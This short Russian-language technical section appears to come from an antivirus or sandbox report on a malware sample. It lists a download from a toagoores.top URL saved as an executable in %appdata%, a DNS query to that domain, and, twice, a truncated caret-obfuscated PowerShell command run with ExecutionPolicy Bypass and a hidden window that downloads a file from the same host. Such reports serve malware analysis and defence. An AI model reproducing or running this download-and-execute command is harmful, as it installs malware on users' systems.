Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWe^r^SHeLL.Ex^e -E^xe^cU^tI^OnpO^lICy ByPas^s^ -NoP^ROF^IlE^ -^W^in^d^OWs^tYL^e hId^dEN ^(n^eW-oBJ^e^Ct s^YST^e^M.NET.wEbC^lIen^t).^DowN^lOA^DFI^Le^('http://toagoores...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "POWe^r^SHeLL.Ex^e -E^xe^cU^tI^OnpO^lICy ByPas^s^ -NoP^ROF^IlE^ -^W^in^d^OWs^tYL^e hId^dEN ^(n^eW-oBJ^e^Ct s^YST^e^M.NET.wEbC^lIen^t).^DowN^lOA^DFI^Le^('http://toagoores...' (со скрытым окном)